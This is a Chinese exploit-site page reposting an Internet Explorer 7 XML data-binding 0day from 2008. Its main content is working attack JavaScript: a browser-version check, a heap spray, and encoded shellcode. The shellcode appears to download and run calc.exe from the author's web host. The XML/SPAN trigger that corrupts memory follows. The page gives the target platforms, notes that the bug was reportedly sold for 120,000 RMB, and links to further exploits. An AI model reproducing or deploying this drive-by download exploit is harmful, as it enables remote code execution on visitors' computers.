Internet Explorer 7.0 XML 0day

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Internet Explorer 7.0 XML 0day

来源：http://www.friddy.cn 作者：friddy 发布时间：2008-12-11

漏洞环境：
XP/2003+Internet Explorer 7.0

测试效果：弹出计算器程序

评述：10月份就有人喊着卖了，据说当时价值12W RMB
<script language="javascript">

if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73\x69\x65 \x37")==-1)
location.replace("\x61\x62\x6F\x75\x74\x3A\x62\x6C\x61\x6E\x6B");
</script>
<script>function sleep(milliseconds)
{
    var start = new Date().getTime();
    for (var i = 0; i < 1e7; i++) {
        if ((new Date().getTime() - start) > milliseconds)
        {              break;
        }
    }
}
function spray(sc) {
var string1 = 0x0a0a0a0a;
var string1temp=unescape;
var shellcodesize = string1temp(sc);
var heapBlockSize = 0x100000; var payLoadSize = shellcodesize.length * 2;
var szlong = heapBlockSize -(payLoadSize+0x038);
var retVal = string1temp("%u0a0a%u0a0a");
retVal = getSampleValue(retVal,szlong);
aaablk = (string1 - 0x100000)/heapBlockSize;
zzchuck = new Array();
for (i=0;i<aaablk;i++)
{
zzchuck[i] = retVal + shellcodesize;
}
}

function getSampleValue(retVal, szlong) {
while(retVal.length*2<szlong)
{
retVal += retVal; }
retVal = retVal.substring(0,szlong/2);
return retVal;
}
var a1="%u";
spray("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u765c%ue800%uffb7%uffff%u2e2e%u765c%ue800%uff89%uffff%%u7468%u7074%u2f3a%u662f%u6972%u6464%u2e79%u6e63%u652f%u7078%u632f%u6c61%u2e63%u7865%u0065");
sleep(5000);
nav=navigator.userAgent.toLowerCase();
if (navigator.appVersion.indexOf('MSIE')!=-1)
{   version=parseFloat(navigator.appVersion.split('MSIE')[1])
}
if (version==7)
{
w2k3 = ((nav.indexOf('windows nt 5.2')!=-1) || (nav.indexOf('windows 2003')!=-1));
wxp = ((nav.indexOf('windows nt 5.1')!=-1) || (nav.indexOf('windows xp')!=-1));
  if (wxp||w2k3)    document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://rਊr.test.com src=http://www.google.cn]]><![CDATA[>]]

></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');
  var i=1;
while ( i <= 10 )
{window.status=" ";i++; }
}
</script>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告